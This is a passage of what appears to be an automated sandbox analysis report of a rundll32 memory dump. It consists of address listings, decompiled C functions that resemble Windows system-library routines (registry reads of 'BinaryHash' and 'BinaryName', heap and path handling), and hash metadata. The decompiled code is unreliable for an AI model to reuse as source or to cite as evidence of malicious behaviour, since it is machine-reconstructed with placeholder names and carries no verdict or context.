                                                                                            0x046a0ec0
                                                                                            0x046a0ec2
                                                                                            0x046a0ecd
                                                                                            0x046a105b
                                                                                            0x046a105b
                                                                                            0x046a1061
                                                                                            0x046a1066
                                                                                            0x046a1066
                                                                                            0x046a106b
                                                                                            0x046a1073
                                                                                            0x046a1073
                                                                                            0x046a0ed3
                                                                                            0x046a0ed6
                                                                                            0x046a0edc
                                                                                            0x046a0ee0
                                                                                            0x046a0ee7
                                                                                            0x046a0ef0
                                                                                            0x046a0ef5
                                                                                            0x046a0efa
                                                                                            0x046a0efc
                                                                                            0x046a0efd
                                                                                            0x046a0f03
                                                                                            0x046a0f04
                                                                                            0x046a0f06
                                                                                            0x046a0f07
                                                                                            0x046a0f09
                                                                                            0x046a0f0e
                                                                                            0x046a0f14
                                                                                            0x046a0f23
                                                                                            0x046a0f2d
                                                                                            0x046a0f34
                                                                                            0x046a0f34
                                                                                            0x046a0f14
                                                                                            0x046a0f52
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a0f58
                                                                                            0x046a0f73
                                                                                            0x046a0f74
                                                                                            0x046a0f79
                                                                                            0x046a0f7d
                                                                                            0x046a0f80
                                                                                            0x046a0f86
                                                                                            0x046a0fab
                                                                                            0x046a0fb5
                                                                                            0x046a0fc6
                                                                                            0x046a0fd1
                                                                                            0x046a0fe3
                                                                                            0x046a0fd3
                                                                                            0x046a0fdc
                                                                                            0x046a0fdc
                                                                                            0x046a0feb
                                                                                            0x046a1009
                                                                                            0x046a1009
                                                                                            0x046a1015
                                                                                            0x046a1027
                                                                                            0x046a1017
                                                                                            0x046a1020
                                                                                            0x046a1020
                                                                                            0x046a102f
                                                                                            0x046a103c
                                                                                            0x046a103c
                                                                                            0x046a1048
                                                                                            0x046a1050
                                                                                            0x046a1050
                                                                                            0x046a1055
                                                                                            0x00000000
                                                                                            0x046a1055
                                                                                            0x046a0f88
                                                                                            0x046a0f9e
                                                                                            0x046a0fa2
                                                                                            0x046a0fa9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a0fa9
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `
                                                                                            • API String ID: 0-2679148245
                                                                                            • Opcode ID: ffa7dea3a43594b7ee440e18f8b2ec68dcba684b217cf60ced8de7215b21983d
                                                                                            • Instruction ID: a76f4d6cab68fbd8c4558e40d5336fcf20090e9910ac6f464d604f51e42d712d
                                                                                            • Opcode Fuzzy Hash: ffa7dea3a43594b7ee440e18f8b2ec68dcba684b217cf60ced8de7215b21983d
                                                                                            • Instruction Fuzzy Hash: 6651DF702047829FE724DF28D984B6BB7E9EBC5314F04492CF99697290EA70FC15CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0460F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 76%
                                                                                            			E0460F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E045F4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04619830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04619990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E046195D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x9e2bf01a
							_t109 = L045F4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x20029e2b
								E0461F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x20029e2b
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E046195D0();
										L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                            0x0460f0d3
                                                                                            0x0460f0d9
                                                                                            0x0460f0e0
                                                                                            0x0460f0e7
                                                                                            0x0460f0f2
                                                                                            0x0460f0f4
                                                                                            0x0460f0f8
                                                                                            0x0460f100
                                                                                            0x0460f108
                                                                                            0x0460f10d
                                                                                            0x0460f115
                                                                                            0x0460f116
                                                                                            0x0460f11f
                                                                                            0x0460f123
                                                                                            0x0460f124
                                                                                            0x0460f12c
                                                                                            0x0460f130
                                                                                            0x0460f134
                                                                                            0x0460f13d
                                                                                            0x0460f144
                                                                                            0x0460f14b
                                                                                            0x0460f152
                                                                                            0x0464bab0
                                                                                            0x0464bab0
                                                                                            0x0460f158
                                                                                            0x0460f158
                                                                                            0x0460f15a
                                                                                            0x0460f160
                                                                                            0x0460f165
                                                                                            0x0460f166
                                                                                            0x0460f16f
                                                                                            0x0460f173
                                                                                            0x0464baa7
                                                                                            0x0464baa7
                                                                                            0x0464baab
                                                                                            0x00000000
                                                                                            0x0460f179
                                                                                            0x0460f179
                                                                                            0x0460f18d
                                                                                            0x0460f191
                                                                                            0x0464baa2
                                                                                            0x00000000
                                                                                            0x0460f197
                                                                                            0x0460f19b
                                                                                            0x0460f1a2
                                                                                            0x0460f1a9
                                                                                            0x0460f1af
                                                                                            0x0460f1b2
                                                                                            0x0460f1b6
                                                                                            0x0460f1b9
                                                                                            0x0460f1c0
                                                                                            0x0460f1c4
                                                                                            0x0460f1d8
                                                                                            0x0460f1df
                                                                                            0x0460f1e3
                                                                                            0x0460f1e6
                                                                                            0x0460f1eb
                                                                                            0x0460f1ee
                                                                                            0x0460f1f4
                                                                                            0x0460f20f
                                                                                            0x0464bab7
                                                                                            0x0464babb
                                                                                            0x0464bacc
                                                                                            0x0464bad1
                                                                                            0x0460f215
                                                                                            0x0460f218
                                                                                            0x0460f226
                                                                                            0x0460f22b
                                                                                            0x00000000
                                                                                            0x0460f22b
                                                                                            0x0460f1f6
                                                                                            0x0460f1f6
                                                                                            0x0460f1f9
                                                                                            0x0460f1fb
                                                                                            0x0460f1fb
                                                                                            0x0460f1f4
                                                                                            0x0460f191
                                                                                            0x0460f173
                                                                                            0x0460f152
                                                                                            0x0460f203

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                            • Instruction ID: 424e11810586fffffd2443e569875c973a110634617f134c1c91ff1e60ae1d14
                                                                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                            • Instruction Fuzzy Hash: C051AE712047119FD324DF29C840A6BBBF8FF88714F00892DFA95976A0E7B4E944CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04653540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 75%
                                                                                            			E04653540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x46cd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04610BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04653706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0461FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04653540;
						E0461FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0462DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04660C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E046197C0();
					}
					return E0461B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04653971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04653884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0461FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04619650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04653787(_a4,  &_v352, _t80);
						}
					}
					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E046195D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                            0x04653552
                                                                                            0x0465355a
                                                                                            0x0465355d
                                                                                            0x04653566
                                                                                            0x04653567
                                                                                            0x0465357e
                                                                                            0x0465358f
                                                                                            0x046535a1
                                                                                            0x046535a5
                                                                                            0x0465366b
                                                                                            0x0465366b
                                                                                            0x0465366d
                                                                                            0x04653672
                                                                                            0x04653679
                                                                                            0x04653685
                                                                                            0x0465368d
                                                                                            0x0465369d
                                                                                            0x046536a7
                                                                                            0x046536b8
                                                                                            0x046536c6
                                                                                            0x046536c7
                                                                                            0x046536dc
                                                                                            0x046536e1
                                                                                            0x046536e7
                                                                                            0x046536e9
                                                                                            0x046536e9
                                                                                            0x04653703
                                                                                            0x04653703
                                                                                            0x046535b5
                                                                                            0x046535c0
                                                                                            0x046535c4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046535ca
                                                                                            0x046535d7
                                                                                            0x046535e2
                                                                                            0x046535e6
                                                                                            0x046535e8
                                                                                            0x046535f5
                                                                                            0x046535fa
                                                                                            0x04653603
                                                                                            0x04653604
                                                                                            0x04653609
                                                                                            0x0465360a
                                                                                            0x04653612
                                                                                            0x04653613
                                                                                            0x0465361e
                                                                                            0x04653622
                                                                                            0x04653628
                                                                                            0x0465362f
                                                                                            0x0465362f
                                                                                            0x04653636
                                                                                            0x04653638
                                                                                            0x0465363b
                                                                                            0x04653642
                                                                                            0x04653642
                                                                                            0x04653636
                                                                                            0x04653657
                                                                                            0x04653657
                                                                                            0x0465365c
                                                                                            0x04653662
                                                                                            0x04653669
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: BinaryHash
                                                                                            • API String ID: 2994545307-2202222882
                                                                                            • Opcode ID: 561f2d0ef9783113cc678884c9a1f99cc771122edaf4605988c9f0e856d42a3a
                                                                                            • Instruction ID: e2713a5be3721500760ecb01e15bc510c162c0c6b7e50fdc049507e42e7f2075
                                                                                            • Opcode Fuzzy Hash: 561f2d0ef9783113cc678884c9a1f99cc771122edaf4605988c9f0e856d42a3a
                                                                                            • Instruction Fuzzy Hash: 984118F1D0151D9AEB219A50CC80F9EB77CAB44758F0045A9EE09A7250EB306E888F99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046A05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 71%
                                                                                            			E046A05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E046A07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04619730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0469A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0469A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E046A1293(_t79, _v40, E046A07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E045F7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0469138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                            0x046a05c5
                                                                                            0x046a05ca
                                                                                            0x046a05d3
                                                                                            0x046a06db
                                                                                            0x046a06db
                                                                                            0x046a06dd
                                                                                            0x046a06e3
                                                                                            0x046a06e3
                                                                                            0x046a05dd
                                                                                            0x046a05e7
                                                                                            0x046a05f6
                                                                                            0x046a0600
                                                                                            0x046a0607
                                                                                            0x046a0610
                                                                                            0x046a0615
                                                                                            0x046a061a
                                                                                            0x046a061c
                                                                                            0x046a061e
                                                                                            0x046a0624
                                                                                            0x046a0625
                                                                                            0x046a0627
                                                                                            0x046a0628
                                                                                            0x046a0631
                                                                                            0x046a0640
                                                                                            0x046a064d
                                                                                            0x046a0654
                                                                                            0x046a0654
                                                                                            0x046a0631
                                                                                            0x046a066d
                                                                                            0x046a0674
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046a0692
                                                                                            0x046a069e
                                                                                            0x046a06b0
                                                                                            0x046a06a0
                                                                                            0x046a06a9
                                                                                            0x046a06a9
                                                                                            0x046a06b8
                                                                                            0x046a06d6
                                                                                            0x046a06d6
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `
                                                                                            • API String ID: 0-2679148245
                                                                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                            • Instruction ID: 3a3ffc5f1f789588407cdbcfc7c43a8a50829149f359ab56ae56f6c5f02f2bcd
                                                                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                            • Instruction Fuzzy Hash: 6631C032704B456BE720DE24CD85F9A77D9AB84758F084229FA58EB280E670FD24CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04653884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 72%
                                                                                            			E04653884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04619650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L045F4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04619650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                            0x04653893
                                                                                            0x04653896
                                                                                            0x04653899
                                                                                            0x0465389f
                                                                                            0x046538a0
                                                                                            0x046538a4
                                                                                            0x046538a9
                                                                                            0x046538ac
                                                                                            0x046538ad
                                                                                            0x046538ae
                                                                                            0x046538af
                                                                                            0x046538b1
                                                                                            0x046538b4
                                                                                            0x046538bb
                                                                                            0x046538bc
                                                                                            0x046538bd
                                                                                            0x046538c4
                                                                                            0x046538c8
                                                                                            0x046538ca
                                                                                            0x046538ca
                                                                                            0x046538d5
                                                                                            0x0465393e
                                                                                            0x04653940
                                                                                            0x04653942
                                                                                            0x04653952
                                                                                            0x04653954
                                                                                            0x04653961
                                                                                            0x04653961
                                                                                            0x04653967
                                                                                            0x0465396e
                                                                                            0x0465396e
                                                                                            0x04653947
                                                                                            0x0465394c
                                                                                            0x00000000
                                                                                            0x0465394c
                                                                                            0x046538ea
                                                                                            0x046538ee
                                                                                            0x046538f8
                                                                                            0x046538f9
                                                                                            0x046538ff
                                                                                            0x04653900
                                                                                            0x04653902
                                                                                            0x04653903
                                                                                            0x0465390b
                                                                                            0x0465390f
                                                                                            0x04653950
                                                                                            0x00000000
                                                                                            0x04653950
                                                                                            0x04653915
                                                                                            0x0465391d
                                                                                            0x0465391d
                                                                                            0x04653922
                                                                                            0x04653926
                                                                                            0x00000000
                                                                                            0x04653928
                                                                                            0x0465392b
                                                                                            0x0465392b
                                                                                            0x04653935
                                                                                            0x04653937
                                                                                            0x04653937
                                                                                            0x00000000
                                                                                            0x04653935
                                                                                            0x04653926
                                                                                            0x046538f0
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: BinaryName
                                                                                            • API String ID: 2994545307-215506332
                                                                                            • Opcode ID: 0a9bae393fc24b797824578a5511a87389a8bde22cdaf782ce58c80878523e2f
                                                                                            • Instruction ID: b406026d7f63d3b2ddefbd681496507851ec48539c791ce964038fcf806e7d7f
                                                                                            • Opcode Fuzzy Hash: 0a9bae393fc24b797824578a5511a87389a8bde22cdaf782ce58c80878523e2f
                                                                                            • Instruction Fuzzy Hash: 8A31E2B290050AAFEB25DA58C945D6BB774FB80B60F014129ED54A7760F730BE44C7E0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0460D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 33%
                                                                                            			E0460D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x46cd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E045F4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0461B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E046198D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E046195D0();
					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                            0x0460d29c
                                                                                            0x0460d2a6
                                                                                            0x0460d2b1
                                                                                            0x0460d2b5
                                                                                            0x0460d2b6
                                                                                            0x0460d2bc
                                                                                            0x0460d2bd
                                                                                            0x0460d2be
                                                                                            0x0460d2bf
                                                                                            0x0460d2c2
                                                                                            0x0460d2c4
                                                                                            0x0460d2cc
                                                                                            0x0460d384
                                                                                            0x0460d34b
                                                                                            0x0460d34f
                                                                                            0x0460d350
                                                                                            0x0460d351
                                                                                            0x0460d35c
                                                                                            0x0460d35c
                                                                                            0x0460d2d6
                                                                                            0x0460d2da
                                                                                            0x0460d2e1
                                                                                            0x0460d361
                                                                                            0x0460d369
                                                                                            0x0460d36d
                                                                                            0x0460d2e3
                                                                                            0x0460d2e3
                                                                                            0x0460d2e3
                                                                                            0x0460d2e5
                                                                                            0x0460d2ed
                                                                                            0x0460d2f5
                                                                                            0x0460d2fa
                                                                                            0x0460d302
                                                                                            0x0460d303
                                                                                            0x0460d30b
                                                                                            0x0460d30f
                                                                                            0x0460d313
                                                                                            0x0460d318
                                                                                            0x0460d31c
                                                                                            0x0460d320
                                                                                            0x0460d379
                                                                                            0x0460d37d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464affe
                                                                                            0x0464b001
                                                                                            0x0464b011
                                                                                            0x00000000
                                                                                            0x0460d322
                                                                                            0x0460d322
                                                                                            0x0460d330
                                                                                            0x0460d337
                                                                                            0x0460d35d
                                                                                            0x0460d339
                                                                                            0x0460d33f
                                                                                            0x0460d38c
                                                                                            0x0460d38c
                                                                                            0x0460d33f
                                                                                            0x0460d349
                                                                                            0x00000000
                                                                                            0x0460d349

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 9ca41e2648f5a0e66e2c908619fcbd65fea363d84042039abf0a3f450bc3e50d
                                                                                            • Instruction ID: 37f8a1b74a98d4de2b6cc495d97e992cc6bccc37cddca1f5829e0522df36d852
                                                                                            • Opcode Fuzzy Hash: 9ca41e2648f5a0e66e2c908619fcbd65fea363d84042039abf0a3f450bc3e50d
